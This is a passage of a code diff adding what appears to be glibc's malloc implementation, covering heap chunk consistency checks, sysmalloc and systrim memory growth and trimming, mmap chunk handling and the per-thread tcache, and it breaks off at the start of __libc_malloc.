+      assert (prev_size (next_chunk (p)) == sz);
+      /* ... and is fully consolidated */
+      assert (prev_inuse (p));
+      assert (next == av->top || inuse (next));
+
+      /* ... and has minimally sane links */
+      assert (p->fd->bk == p);
+      assert (p->bk->fd == p);
+    }
+  else /* markers are always of size SIZE_SZ */
+    assert (sz == SIZE_SZ);
+}
+
+/*
+   Properties of inuse chunks
+ */
+
+static void
+do_check_inuse_chunk (mstate av, mchunkptr p)
+{
+  mchunkptr next;
+
+  do_check_chunk (av, p);
+
+  if (chunk_is_mmapped (p))
+    return; /* mmapped chunks have no next/prev */
+
+  /* Check whether it claims to be in use ... */
+  assert (inuse (p));
+
+  next = next_chunk (p);
+
+  /* ... and is surrounded by OK chunks.
+     Since more things can be checked with free chunks than inuse ones,
+     if an inuse chunk borders them and debug is on, it's worth doing them.
+   */
+  if (!prev_inuse (p))
+    {
+      /* Note that we cannot even look at prev unless it is not inuse */
+      mchunkptr prv = prev_chunk (p);
+      assert (next_chunk (prv) == p);
+      do_check_free_chunk (av, prv);
+    }
+
+  if (next == av->top)
+    {
+      assert (prev_inuse (next));
+      assert (chunksize (next) >= MINSIZE);
+    }
+  else if (!inuse (next))
+    do_check_free_chunk (av, next);
+}
+
+/*
+   Properties of chunks recycled from fastbins
+ */
+
+static void
+do_check_remalloced_chunk (mstate av, mchunkptr p, INTERNAL_SIZE_T s)
+{
+  INTERNAL_SIZE_T sz = chunksize_nomask (p) & ~(PREV_INUSE | NON_MAIN_ARENA);
+
+  if (!chunk_is_mmapped (p))
+    {
+      assert (av == arena_for_chunk (p));
+      if (chunk_main_arena (p))
+        assert (av == &main_arena);
+      else
+        assert (av != &main_arena);
+    }
+
+  do_check_inuse_chunk (av, p);
+
+  /* Legal size ... */
+  assert ((sz & MALLOC_ALIGN_MASK) == 0);
+  assert ((unsigned long) (sz) >= MINSIZE);
+  /* ... and alignment */
+  assert (aligned_OK (chunk2mem (p)));
+  /* chunk is less than MINSIZE more than request */
+  assert ((long) (sz) - (long) (s) >= 0);
+  assert ((long) (sz) - (long) (s + MINSIZE) < 0);
+}
+
+/*
+   Properties of nonrecycled chunks at the point they are malloced
+ */
+
+static void
+do_check_malloced_chunk (mstate av, mchunkptr p, INTERNAL_SIZE_T s)
+{
+  /* same as recycled case ... */
+  do_check_remalloced_chunk (av, p, s);
+
+  /*
+     ... plus,  must obey implementation invariant that prev_inuse is
+     always true of any allocated chunk; i.e., that each allocated
+     chunk borders either a previously allocated and still in-use
+     chunk, or the base of its memory arena. This is ensured
+     by making all allocations from the `lowest' part of any found
+     chunk.  This does not necessarily hold however for chunks
+     recycled via fastbins.
+   */
+
+  assert (prev_inuse (p));
+}
+
+
+/*
+   Properties of malloc_state.
+
+   This may be useful for debugging malloc, as well as detecting user
+   programmer errors that somehow write into malloc_state.
+
+   If you are extending or experimenting with this malloc, you can
+   probably figure out how to hack this routine to print out or
+   display chunk addresses, sizes, bins, and other instrumentation.
+ */
+
+static void
+do_check_malloc_state (mstate av)
+{
+  int i;
+  mchunkptr p;
+  mchunkptr q;
+  mbinptr b;
+  unsigned int idx;
+  INTERNAL_SIZE_T size;
+  unsigned long total = 0;
+  int max_fast_bin;
+
+  /* internal size_t must be no wider than pointer type */
+  assert (sizeof (INTERNAL_SIZE_T) <= sizeof (char *));
+
+  /* alignment is a power of 2 */
+  assert ((MALLOC_ALIGNMENT & (MALLOC_ALIGNMENT - 1)) == 0);
+
+  /* Check the arena is initialized. */
+  assert (av->top != 0);
+
+  /* No memory has been allocated yet, so doing more tests is not possible.  */
+  if (av->top == initial_top (av))
+    return;
+
+  /* pagesize is a power of 2 */
+  assert (powerof2(GLRO (dl_pagesize)));
+
+  /* A contiguous main_arena is consistent with sbrk_base.  */
+  if (av == &main_arena && contiguous (av))
+    assert ((char *) mp_.sbrk_base + av->system_mem ==
+            (char *) av->top + chunksize (av->top));
+
+  /* properties of fastbins */
+
+  /* max_fast is in allowed range */
+  assert ((get_max_fast () & ~1) <= request2size (MAX_FAST_SIZE));
+
+  max_fast_bin = fastbin_index (get_max_fast ());
+
+  for (i = 0; i < NFASTBINS; ++i)
+    {
+      p = fastbin (av, i);
+
+      /* The following test can only be performed for the main arena.
+         While mallopt calls malloc_consolidate to get rid of all fast
+         bins (especially those larger than the new maximum) this does
+         only happen for the main arena.  Trying to do this for any
+         other arena would mean those arenas have to be locked and
+         malloc_consolidate be called for them.  This is excessive.  And
+         even if this is acceptable to somebody it still cannot solve
+         the problem completely since if the arena is locked a
+         concurrent malloc call might create a new arena which then
+         could use the newly invalid fast bins.  */
+
+      /* all bins past max_fast are empty */
+      if (av == &main_arena && i > max_fast_bin)
+        assert (p == 0);
+
+      while (p != 0)
+        {
+          /* each chunk claims to be inuse */
+          do_check_inuse_chunk (av, p);
+          total += chunksize (p);
+          /* chunk belongs in this bin */
+          assert (fastbin_index (chunksize (p)) == i);
+          p = p->fd;
+        }
+    }
+
+  /* check normal bins */
+  for (i = 1; i < NBINS; ++i)
+    {
+      b = bin_at (av, i);
+
+      /* binmap is accurate (except for bin 1 == unsorted_chunks) */
+      if (i >= 2)
+        {
+          unsigned int binbit = get_binmap (av, i);
+          int empty = last (b) == b;
+          if (!binbit)
+            assert (empty);
+          else if (!empty)
+            assert (binbit);
+        }
+
+      for (p = last (b); p != b; p = p->bk)
+        {
+          /* each chunk claims to be free */
+          do_check_free_chunk (av, p);
+          size = chunksize (p);
+          total += size;
+          if (i >= 2)
+            {
+              /* chunk belongs in bin */
+              idx = bin_index (size);
+              assert (idx == i);
+              /* lists are sorted */
+              assert (p->bk == b ||
+                      (unsigned long) chunksize (p->bk) >= (unsigned long) chunksize (p));
+
+              if (!in_smallbin_range (size))
+                {
+                  if (p->fd_nextsize != NULL)
+                    {
+                      if (p->fd_nextsize == p)
+                        assert (p->bk_nextsize == p);
+                      else
+                        {
+                          if (p->fd_nextsize == first (b))
+                            assert (chunksize (p) < chunksize (p->fd_nextsize));
+                          else
+                            assert (chunksize (p) > chunksize (p->fd_nextsize));
+
+                          if (p == first (b))
+                            assert (chunksize (p) > chunksize (p->bk_nextsize));
+                          else
+                            assert (chunksize (p) < chunksize (p->bk_nextsize));
+                        }
+                    }
+                  else
+                    assert (p->bk_nextsize == NULL);
+                }
+            }
+          else if (!in_smallbin_range (size))
+            assert (p->fd_nextsize == NULL && p->bk_nextsize == NULL);
+          /* chunk is followed by a legal chain of inuse chunks */
+          for (q = next_chunk (p);
+               (q != av->top && inuse (q) &&
+                (unsigned long) (chunksize (q)) >= MINSIZE);
+               q = next_chunk (q))
+            do_check_inuse_chunk (av, q);
+        }
+    }
+
+  /* top chunk is OK */
+  check_chunk (av, av->top);
+}
+#endif
+
+
+/* ----------------- Support for debugging hooks -------------------- */
+#include "hooks.c"
+
+
+/* ----------- Routines dealing with system allocation -------------- */
+
+/*
+   sysmalloc handles malloc cases requiring more memory from the system.
+   On entry, it is assumed that av->top does not have enough
+   space to service request for nb bytes, thus requiring that av->top
+   be extended or replaced.
+ */
+
+static void *
+sysmalloc (INTERNAL_SIZE_T nb, mstate av)
+{
+  mchunkptr old_top;              /* incoming value of av->top */
+  INTERNAL_SIZE_T old_size;       /* its size */
+  char *old_end;                  /* its end address */
+
+  long size;                      /* arg to first MORECORE or mmap call */
+  char *brk;                      /* return value from MORECORE */
+
+  long correction;                /* arg to 2nd MORECORE call */
+  char *snd_brk;                  /* 2nd return val */
+
+  INTERNAL_SIZE_T front_misalign; /* unusable bytes at front of new space */
+  INTERNAL_SIZE_T end_misalign;   /* partial page left at end of new space */
+  char *aligned_brk;              /* aligned offset into brk */
+
+  mchunkptr p;                    /* the allocated/returned chunk */
+  mchunkptr remainder;            /* remainder from allocation */
+  unsigned long remainder_size;   /* its size */
+
+
+  size_t pagesize = GLRO (dl_pagesize);
+  bool tried_mmap = false;
+
+
+  /*
+     If have mmap, and the request size meets the mmap threshold, and
+     the system supports mmap, and there are few enough currently
+     allocated mmapped regions, try to directly map this request
+     rather than expanding top.
+   */
+
+  if (av == NULL
+      || ((unsigned long) (nb) >= (unsigned long) (mp_.mmap_threshold)
+	  && (mp_.n_mmaps < mp_.n_mmaps_max)))
+    {
+      char *mm;           /* return value from mmap call*/
+
+    try_mmap:
+      /*
+         Round up size to nearest page.  For mmapped chunks, the overhead
+         is one SIZE_SZ unit larger than for normal chunks, because there
+         is no following chunk whose prev_size field could be used.
+
+         See the front_misalign handling below, for glibc there is no
+         need for further alignments unless we have have high alignment.
+       */
+      if (MALLOC_ALIGNMENT == 2 * SIZE_SZ)
+        size = ALIGN_UP (nb + SIZE_SZ, pagesize);
+      else
+        size = ALIGN_UP (nb + SIZE_SZ + MALLOC_ALIGN_MASK, pagesize);
+      tried_mmap = true;
+
+      /* Don't try if size wraps around 0 */
+      if ((unsigned long) (size) > (unsigned long) (nb))
+        {
+          mm = (char *) (MMAP (0, size, PROT_READ | PROT_WRITE, 0));
+
+          if (mm != MAP_FAILED)
+            {
+              /*
+                 The offset to the start of the mmapped region is stored
+                 in the prev_size field of the chunk. This allows us to adjust
+                 returned start address to meet alignment requirements here
+                 and in memalign(), and still be able to compute proper
+                 address argument for later munmap in free() and realloc().
+               */
+
+              if (MALLOC_ALIGNMENT == 2 * SIZE_SZ)
+                {
+                  /* For glibc, chunk2mem increases the address by 2*SIZE_SZ and
+                     MALLOC_ALIGN_MASK is 2*SIZE_SZ-1.  Each mmap'ed area is page
+                     aligned and therefore definitely MALLOC_ALIGN_MASK-aligned.  */
+                  assert (((INTERNAL_SIZE_T) chunk2mem (mm) & MALLOC_ALIGN_MASK) == 0);
+                  front_misalign = 0;
+                }
+              else
+                front_misalign = (INTERNAL_SIZE_T) chunk2mem (mm) & MALLOC_ALIGN_MASK;
+              if (front_misalign > 0)
+                {
+                  correction = MALLOC_ALIGNMENT - front_misalign;
+                  p = (mchunkptr) (mm + correction);
+		  set_prev_size (p, correction);
+                  set_head (p, (size - correction) | IS_MMAPPED);
+                }
+              else
+                {
+                  p = (mchunkptr) mm;
+		  set_prev_size (p, 0);
+                  set_head (p, size | IS_MMAPPED);
+                }
+
+              /* update statistics */
+
+              int new = atomic_exchange_and_add (&mp_.n_mmaps, 1) + 1;
+              atomic_max (&mp_.max_n_mmaps, new);
+
+              unsigned long sum;
+              sum = atomic_exchange_and_add (&mp_.mmapped_mem, size) + size;
+              atomic_max (&mp_.max_mmapped_mem, sum);
+
+              check_chunk (av, p);
+
+              return chunk2mem (p);
+            }
+        }
+    }
+
+  /* There are no usable arenas and mmap also failed.  */
+  if (av == NULL)
+    return 0;
+
+  /* Record incoming configuration of top */
+
+  old_top = av->top;
+  old_size = chunksize (old_top);
+  old_end = (char *) (chunk_at_offset (old_top, old_size));
+
+  brk = snd_brk = (char *) (MORECORE_FAILURE);
+
+  /*
+     If not the first time through, we require old_size to be
+     at least MINSIZE and to have prev_inuse set.
+   */
+
+  assert ((old_top == initial_top (av) && old_size == 0) ||
+          ((unsigned long) (old_size) >= MINSIZE &&
+           prev_inuse (old_top) &&
+           ((unsigned long) old_end & (pagesize - 1)) == 0));
+
+  /* Precondition: not enough current space to satisfy nb request */
+  assert ((unsigned long) (old_size) < (unsigned long) (nb + MINSIZE));
+
+
+  if (av != &main_arena)
+    {
+      heap_info *old_heap, *heap;
+      size_t old_heap_size;
+
+      /* First try to extend the current heap. */
+      old_heap = heap_for_ptr (old_top);
+      old_heap_size = old_heap->size;
+      if ((long) (MINSIZE + nb - old_size) > 0
+          && grow_heap (old_heap, MINSIZE + nb - old_size) == 0)
+        {
+          av->system_mem += old_heap->size - old_heap_size;
+          set_head (old_top, (((char *) old_heap + old_heap->size) - (char *) old_top)
+                    | PREV_INUSE);
+        }
+      else if ((heap = new_heap (nb + (MINSIZE + sizeof (*heap)), mp_.top_pad)))
+        {
+          /* Use a newly allocated heap.  */
+          heap->ar_ptr = av;
+          heap->prev = old_heap;
+          av->system_mem += heap->size;
+          /* Set up the new top.  */
+          top (av) = chunk_at_offset (heap, sizeof (*heap));
+          set_head (top (av), (heap->size - sizeof (*heap)) | PREV_INUSE);
+
+          /* Setup fencepost and free the old top chunk with a multiple of
+             MALLOC_ALIGNMENT in size. */
+          /* The fencepost takes at least MINSIZE bytes, because it might
+             become the top chunk again later.  Note that a footer is set
+             up, too, although the chunk is marked in use. */
+          old_size = (old_size - MINSIZE) & ~MALLOC_ALIGN_MASK;
+          set_head (chunk_at_offset (old_top, old_size + 2 * SIZE_SZ), 0 | PREV_INUSE);
+          if (old_size >= MINSIZE)
+            {
+              set_head (chunk_at_offset (old_top, old_size), (2 * SIZE_SZ) | PREV_INUSE);
+              set_foot (chunk_at_offset (old_top, old_size), (2 * SIZE_SZ));
+              set_head (old_top, old_size | PREV_INUSE | NON_MAIN_ARENA);
+              _int_free (av, old_top, 1);
+            }
+          else
+            {
+              set_head (old_top, (old_size + 2 * SIZE_SZ) | PREV_INUSE);
+              set_foot (old_top, (old_size + 2 * SIZE_SZ));
+            }
+        }
+      else if (!tried_mmap)
+        /* We can at least try to use to mmap memory.  */
+        goto try_mmap;
+    }
+  else     /* av == main_arena */
+
+
+    { /* Request enough space for nb + pad + overhead */
+      size = nb + mp_.top_pad + MINSIZE;
+
+      /*
+         If contiguous, we can subtract out existing space that we hope to
+         combine with new space. We add it back later only if
+         we don't actually get contiguous space.
+       */
+
+      if (contiguous (av))
+        size -= old_size;
+
+      /*
+         Round to a multiple of page size.
+         If MORECORE is not contiguous, this ensures that we only call it
+         with whole-page arguments.  And if MORECORE is contiguous and
+         this is not first time through, this preserves page-alignment of
+         previous calls. Otherwise, we correct to page-align below.
+       */
+
+      size = ALIGN_UP (size, pagesize);
+
+      /*
+         Don't try to call MORECORE if argument is so big as to appear
+         negative. Note that since mmap takes size_t arg, it may succeed
+         below even if we cannot call MORECORE.
+       */
+
+      if (size > 0)
+        {
+          brk = (char *) (MORECORE (size));
+          LIBC_PROBE (memory_sbrk_more, 2, brk, size);
+        }
+
+      if (brk != (char *) (MORECORE_FAILURE))
+        {
+          /* Call the `morecore' hook if necessary.  */
+          void (*hook) (void) = atomic_forced_read (__after_morecore_hook);
+          if (__builtin_expect (hook != NULL, 0))
+            (*hook)();
+        }
+      else
+        {
+          /*
+             If have mmap, try using it as a backup when MORECORE fails or
+             cannot be used. This is worth doing on systems that have "holes" in
+             address space, so sbrk cannot extend to give contiguous space, but
+             space is available elsewhere.  Note that we ignore mmap max count
+             and threshold limits, since the space will not be used as a
+             segregated mmap region.
+           */
+
+          /* Cannot merge with old top, so add its size back in */
+          if (contiguous (av))
+            size = ALIGN_UP (size + old_size, pagesize);
+
+          /* If we are relying on mmap as backup, then use larger units */
+          if ((unsigned long) (size) < (unsigned long) (MMAP_AS_MORECORE_SIZE))
+            size = MMAP_AS_MORECORE_SIZE;
+
+          /* Don't try if size wraps around 0 */
+          if ((unsigned long) (size) > (unsigned long) (nb))
+            {
+              char *mbrk = (char *) (MMAP (0, size, PROT_READ | PROT_WRITE, 0));
+
+              if (mbrk != MAP_FAILED)
+                {
+                  /* We do not need, and cannot use, another sbrk call to find end */
+                  brk = mbrk;
+                  snd_brk = brk + size;
+
+                  /*
+                     Record that we no longer have a contiguous sbrk region.
+                     After the first time mmap is used as backup, we do not
+                     ever rely on contiguous space since this could incorrectly
+                     bridge regions.
+                   */
+                  set_noncontiguous (av);
+                }
+            }
+        }
+
+      if (brk != (char *) (MORECORE_FAILURE))
+        {
+          if (mp_.sbrk_base == 0)
+            mp_.sbrk_base = brk;
+          av->system_mem += size;
+
+          /*
+             If MORECORE extends previous space, we can likewise extend top size.
+           */
+
+          if (brk == old_end && snd_brk == (char *) (MORECORE_FAILURE))
+            set_head (old_top, (size + old_size) | PREV_INUSE);
+
+          else if (contiguous (av) && old_size && brk < old_end)
+	    /* Oops!  Someone else killed our space..  Can't touch anything.  */
+	    malloc_printerr ("break adjusted to free malloc space");
+
+          /*
+             Otherwise, make adjustments:
+
+           * If the first time through or noncontiguous, we need to call sbrk
+              just to find out where the end of memory lies.
+
+           * We need to ensure that all returned chunks from malloc will meet
+              MALLOC_ALIGNMENT
+
+           * If there was an intervening foreign sbrk, we need to adjust sbrk
+              request size to account for fact that we will not be able to
+              combine new space with existing space in old_top.
+
+           * Almost all systems internally allocate whole pages at a time, in
+              which case we might as well use the whole last page of request.
+              So we allocate enough more memory to hit a page boundary now,
+              which in turn causes future contiguous calls to page-align.
+           */
+
+          else
+            {
+              front_misalign = 0;
+              end_misalign = 0;
+              correction = 0;
+              aligned_brk = brk;
+
+              /* handle contiguous cases */
+              if (contiguous (av))
+                {
+                  /* Count foreign sbrk as system_mem.  */
+                  if (old_size)
+                    av->system_mem += brk - old_end;
+
+                  /* Guarantee alignment of first new chunk made from this space */
+
+                  front_misalign = (INTERNAL_SIZE_T) chunk2mem (brk) & MALLOC_ALIGN_MASK;
+                  if (front_misalign > 0)
+                    {
+                      /*
+                         Skip over some bytes to arrive at an aligned position.
+                         We don't need to specially mark these wasted front bytes.
+                         They will never be accessed anyway because
+                         prev_inuse of av->top (and any chunk created from its start)
+                         is always true after initialization.
+                       */
+
+                      correction = MALLOC_ALIGNMENT - front_misalign;
+                      aligned_brk += correction;
+                    }
+
+                  /*
+                     If this isn't adjacent to existing space, then we will not
+                     be able to merge with old_top space, so must add to 2nd request.
+                   */
+
+                  correction += old_size;
+
+                  /* Extend the end address to hit a page boundary */
+                  end_misalign = (INTERNAL_SIZE_T) (brk + size + correction);
+                  correction += (ALIGN_UP (end_misalign, pagesize)) - end_misalign;
+
+                  assert (correction >= 0);
+                  snd_brk = (char *) (MORECORE (correction));
+
+                  /*
+                     If can't allocate correction, try to at least find out current
+                     brk.  It might be enough to proceed without failing.
+
+                     Note that if second sbrk did NOT fail, we assume that space
+                     is contiguous with first sbrk. This is a safe assumption unless
+                     program is multithreaded but doesn't use locks and a foreign sbrk
+                     occurred between our first and second calls.
+                   */
+
+                  if (snd_brk == (char *) (MORECORE_FAILURE))
+                    {
+                      correction = 0;
+                      snd_brk = (char *) (MORECORE (0));
+                    }
+                  else
+                    {
+                      /* Call the `morecore' hook if necessary.  */
+                      void (*hook) (void) = atomic_forced_read (__after_morecore_hook);
+                      if (__builtin_expect (hook != NULL, 0))
+                        (*hook)();
+                    }
+                }
+
+              /* handle non-contiguous cases */
+              else
+                {
+                  if (MALLOC_ALIGNMENT == 2 * SIZE_SZ)
+                    /* MORECORE/mmap must correctly align */
+                    assert (((unsigned long) chunk2mem (brk) & MALLOC_ALIGN_MASK) == 0);
+                  else
+                    {
+                      front_misalign = (INTERNAL_SIZE_T) chunk2mem (brk) & MALLOC_ALIGN_MASK;
+                      if (front_misalign > 0)
+                        {
+                          /*
+                             Skip over some bytes to arrive at an aligned position.
+                             We don't need to specially mark these wasted front bytes.
+                             They will never be accessed anyway because
+                             prev_inuse of av->top (and any chunk created from its start)
+                             is always true after initialization.
+                           */
+
+                          aligned_brk += MALLOC_ALIGNMENT - front_misalign;
+                        }
+                    }
+
+                  /* Find out current end of memory */
+                  if (snd_brk == (char *) (MORECORE_FAILURE))
+                    {
+                      snd_brk = (char *) (MORECORE (0));
+                    }
+                }
+
+              /* Adjust top based on results of second sbrk */
+              if (snd_brk != (char *) (MORECORE_FAILURE))
+                {
+                  av->top = (mchunkptr) aligned_brk;
+                  set_head (av->top, (snd_brk - aligned_brk + correction) | PREV_INUSE);
+                  av->system_mem += correction;
+
+                  /*
+                     If not the first time through, we either have a
+                     gap due to foreign sbrk or a non-contiguous region.  Insert a
+                     double fencepost at old_top to prevent consolidation with space
+                     we don't own. These fenceposts are artificial chunks that are
+                     marked as inuse and are in any case too small to use.  We need
+                     two to make sizes and alignments work out.
+                   */
+
+                  if (old_size != 0)
+                    {
+                      /*
+                         Shrink old_top to insert fenceposts, keeping size a
+                         multiple of MALLOC_ALIGNMENT. We know there is at least
+                         enough space in old_top to do this.
+                       */
+                      old_size = (old_size - 4 * SIZE_SZ) & ~MALLOC_ALIGN_MASK;
+                      set_head (old_top, old_size | PREV_INUSE);
+
+                      /*
+                         Note that the following assignments completely overwrite
+                         old_top when old_size was previously MINSIZE.  This is
+                         intentional. We need the fencepost, even if old_top otherwise gets
+                         lost.
+                       */
+		      set_head (chunk_at_offset (old_top, old_size),
+				(2 * SIZE_SZ) | PREV_INUSE);
+		      set_head (chunk_at_offset (old_top, old_size + 2 * SIZE_SZ),
+				(2 * SIZE_SZ) | PREV_INUSE);
+
+                      /* If possible, release the rest. */
+                      if (old_size >= MINSIZE)
+                        {
+                          _int_free (av, old_top, 1);
+                        }
+                    }
+                }
+            }
+        }
+    } /* if (av !=  &main_arena) */
+
+  if ((unsigned long) av->system_mem > (unsigned long) (av->max_system_mem))
+    av->max_system_mem = av->system_mem;
+  check_malloc_state (av);
+
+  /* finally, do the allocation */
+  p = av->top;
+  size = chunksize (p);
+
+  /* check that one of the above allocation paths succeeded */
+  if ((unsigned long) (size) >= (unsigned long) (nb + MINSIZE))
+    {
+      remainder_size = size - nb;
+      remainder = chunk_at_offset (p, nb);
+      av->top = remainder;
+      set_head (p, nb | PREV_INUSE | (av != &main_arena ? NON_MAIN_ARENA : 0));
+      set_head (remainder, remainder_size | PREV_INUSE);
+      check_malloced_chunk (av, p, nb);
+      return chunk2mem (p);
+    }
+
+  /* catch all failure paths */
+  __set_errno (ENOMEM);
+  return 0;
+}
+
+
+/*
+   systrim is an inverse of sorts to sysmalloc.  It gives memory back
+   to the system (via negative arguments to sbrk) if there is unused
+   memory at the `high' end of the malloc pool. It is called
+   automatically by free() when top space exceeds the trim
+   threshold. It is also called by the public malloc_trim routine.  It
+   returns 1 if it actually released any memory, else 0.
+ */
+
+static int
+systrim (size_t pad, mstate av)
+{
+  long top_size;         /* Amount of top-most memory */
+  long extra;            /* Amount to release */
+  long released;         /* Amount actually released */
+  char *current_brk;     /* address returned by pre-check sbrk call */
+  char *new_brk;         /* address returned by post-check sbrk call */
+  size_t pagesize;
+  long top_area;
+
+  pagesize = GLRO (dl_pagesize);
+  top_size = chunksize (av->top);
+
+  top_area = top_size - MINSIZE - 1;
+  if (top_area <= pad)
+    return 0;
+
+  /* Release in pagesize units and round down to the nearest page.  */
+  extra = ALIGN_DOWN(top_area - pad, pagesize);
+
+  if (extra == 0)
+    return 0;
+
+  /*
+     Only proceed if end of memory is where we last set it.
+     This avoids problems if there were foreign sbrk calls.
+   */
+  current_brk = (char *) (MORECORE (0));
+  if (current_brk == (char *) (av->top) + top_size)
+    {
+      /*
+         Attempt to release memory. We ignore MORECORE return value,
+         and instead call again to find out where new end of memory is.
+         This avoids problems if first call releases less than we asked,
+         of if failure somehow altered brk value. (We could still
+         encounter problems if it altered brk in some very bad way,
+         but the only thing we can do is adjust anyway, which will cause
+         some downstream failure.)
+       */
+
+      MORECORE (-extra);
+      /* Call the `morecore' hook if necessary.  */
+      void (*hook) (void) = atomic_forced_read (__after_morecore_hook);
+      if (__builtin_expect (hook != NULL, 0))
+        (*hook)();
+      new_brk = (char *) (MORECORE (0));
+
+      LIBC_PROBE (memory_sbrk_less, 2, new_brk, extra);
+
+      if (new_brk != (char *) MORECORE_FAILURE)
+        {
+          released = (long) (current_brk - new_brk);
+
+          if (released != 0)
+            {
+              /* Success. Adjust top. */
+              av->system_mem -= released;
+              set_head (av->top, (top_size - released) | PREV_INUSE);
+              check_malloc_state (av);
+              return 1;
+            }
+        }
+    }
+  return 0;
+}
+
+static void
+munmap_chunk (mchunkptr p)
+{
+  size_t pagesize = GLRO (dl_pagesize);
+  INTERNAL_SIZE_T size = chunksize (p);
+
+  assert (chunk_is_mmapped (p));
+
+  /* Do nothing if the chunk is a faked mmapped chunk in the dumped
+     main arena.  We never free this memory.  */
+  if (DUMPED_MAIN_ARENA_CHUNK (p))
+    return;
+
+  uintptr_t mem = (uintptr_t) chunk2mem (p);
+  uintptr_t block = (uintptr_t) p - prev_size (p);
+  size_t total_size = prev_size (p) + size;
+  /* Unfortunately we have to do the compilers job by hand here.  Normally
+     we would test BLOCK and TOTAL-SIZE separately for compliance with the
+     page size.  But gcc does not recognize the optimization possibility
+     (in the moment at least) so we combine the two values into one before
+     the bit test.  */
+  if (__glibc_unlikely ((block | total_size) & (pagesize - 1)) != 0
+      || __glibc_unlikely (!powerof2 (mem & (pagesize - 1))))
+    malloc_printerr ("munmap_chunk(): invalid pointer");
+
+  atomic_decrement (&mp_.n_mmaps);
+  atomic_add (&mp_.mmapped_mem, -total_size);
+
+  /* If munmap failed the process virtual memory address space is in a
+     bad shape.  Just leave the block hanging around, the process will
+     terminate shortly anyway since not much can be done.  */
+  __munmap ((char *) block, total_size);
+}
+
+#if HAVE_MREMAP
+
+static mchunkptr
+mremap_chunk (mchunkptr p, size_t new_size)
+{
+  size_t pagesize = GLRO (dl_pagesize);
+  INTERNAL_SIZE_T offset = prev_size (p);
+  INTERNAL_SIZE_T size = chunksize (p);
+  char *cp;
+
+  assert (chunk_is_mmapped (p));
+
+  uintptr_t block = (uintptr_t) p - offset;
+  uintptr_t mem = (uintptr_t) chunk2mem(p);
+  size_t total_size = offset + size;
+  if (__glibc_unlikely ((block | total_size) & (pagesize - 1)) != 0
+      || __glibc_unlikely (!powerof2 (mem & (pagesize - 1))))
+    malloc_printerr("mremap_chunk(): invalid pointer");
+
+  /* Note the extra SIZE_SZ overhead as in mmap_chunk(). */
+  new_size = ALIGN_UP (new_size + offset + SIZE_SZ, pagesize);
+
+  /* No need to remap if the number of pages does not change.  */
+  if (total_size == new_size)
+    return p;
+
+  cp = (char *) __mremap ((char *) block, total_size, new_size,
+                          MREMAP_MAYMOVE);
+
+  if (cp == MAP_FAILED)
+    return 0;
+
+  p = (mchunkptr) (cp + offset);
+
+  assert (aligned_OK (chunk2mem (p)));
+
+  assert (prev_size (p) == offset);
+  set_head (p, (new_size - offset) | IS_MMAPPED);
+
+  INTERNAL_SIZE_T new;
+  new = atomic_exchange_and_add (&mp_.mmapped_mem, new_size - size - offset)
+        + new_size - size - offset;
+  atomic_max (&mp_.max_mmapped_mem, new);
+  return p;
+}
+#endif /* HAVE_MREMAP */
+
+/*------------------------ Public wrappers. --------------------------------*/
+
+#if USE_TCACHE
+
+/* We overlay this structure on the user-data portion of a chunk when
+   the chunk is stored in the per-thread cache.  */
+typedef struct tcache_entry
+{
+  struct tcache_entry *next;
+  /* This field exists to detect double frees.  */
+  struct tcache_perthread_struct *key;
+} tcache_entry;
+
+/* There is one of these for each thread, which contains the
+   per-thread cache (hence "tcache_perthread_struct").  Keeping
+   overall size low is mildly important.  Note that COUNTS and ENTRIES
+   are redundant (we could have just counted the linked list each
+   time), this is for performance reasons.  */
+typedef struct tcache_perthread_struct
+{
+  uint16_t counts[TCACHE_MAX_BINS];
+  tcache_entry *entries[TCACHE_MAX_BINS];
+} tcache_perthread_struct;
+
+static __thread bool tcache_shutting_down = false;
+static __thread tcache_perthread_struct *tcache = NULL;
+
+/* Caller must ensure that we know tc_idx is valid and there's room
+   for more chunks.  */
+static __always_inline void
+tcache_put (mchunkptr chunk, size_t tc_idx)
+{
+  tcache_entry *e = (tcache_entry *) chunk2mem (chunk);
+
+  /* Mark this chunk as "in the tcache" so the test in _int_free will
+     detect a double free.  */
+  e->key = tcache;
+
+  e->next = tcache->entries[tc_idx];
+  tcache->entries[tc_idx] = e;
+  ++(tcache->counts[tc_idx]);
+}
+
+/* Caller must ensure that we know tc_idx is valid and there's
+   available chunks to remove.  */
+static __always_inline void *
+tcache_get (size_t tc_idx)
+{
+  tcache_entry *e = tcache->entries[tc_idx];
+  tcache->entries[tc_idx] = e->next;
+  --(tcache->counts[tc_idx]);
+  e->key = NULL;
+  return (void *) e;
+}
+
+static void
+tcache_thread_shutdown (void)
+{
+  int i;
+  tcache_perthread_struct *tcache_tmp = tcache;
+
+  if (!tcache)
+    return;
+
+  /* Disable the tcache and prevent it from being reinitialized.  */
+  tcache = NULL;
+  tcache_shutting_down = true;
+
+  /* Free all of the entries and the tcache itself back to the arena
+     heap for coalescing.  */
+  for (i = 0; i < TCACHE_MAX_BINS; ++i)
+    {
+      while (tcache_tmp->entries[i])
+	{
+	  tcache_entry *e = tcache_tmp->entries[i];
+	  tcache_tmp->entries[i] = e->next;
+	  __libc_free (e);
+	}
+    }
+
+  __libc_free (tcache_tmp);
+}
+
+static void
+tcache_init(void)
+{
+  mstate ar_ptr;
+  void *victim = 0;
+  const size_t bytes = sizeof (tcache_perthread_struct);
+
+  if (tcache_shutting_down)
+    return;
+
+  arena_get (ar_ptr, bytes);
+  victim = _int_malloc (ar_ptr, bytes);
+  if (!victim && ar_ptr != NULL)
+    {
+      ar_ptr = arena_get_retry (ar_ptr, bytes);
+      victim = _int_malloc (ar_ptr, bytes);
+    }
+
+
+  if (ar_ptr != NULL)
+    __libc_lock_unlock (ar_ptr->mutex);
+
+  /* In a low memory situation, we may not be able to allocate memory
+     - in which case, we just keep trying later.  However, we
+     typically do this very early, so either there is sufficient
+     memory, or there isn't enough memory to do non-trivial
+     allocations anyway.  */
+  if (victim)
+    {
+      tcache = (tcache_perthread_struct *) victim;
+      memset (tcache, 0, sizeof (tcache_perthread_struct));
+    }
+
+}
+
+# define MAYBE_INIT_TCACHE() \
+  if (__glibc_unlikely (tcache == NULL)) \
+    tcache_init();
+
+#else  /* !USE_TCACHE */
+# define MAYBE_INIT_TCACHE()
+
+static void
+tcache_thread_shutdown (void)
+{
+  /* Nothing to do if there is no thread cache.  */
+}
+
+#endif /* !USE_TCACHE  */
+
+void *
+__libc_malloc (size_t bytes)
+{
+  mstate ar_ptr;
+  void *victim;
+
+  _Static_assert (PTRDIFF_MAX <= SIZE_MAX / 2,
+                  "PTRDIFF_MAX is not more than half of SIZE_MAX");
+
+  void *(*hook) (size_t, const void *)
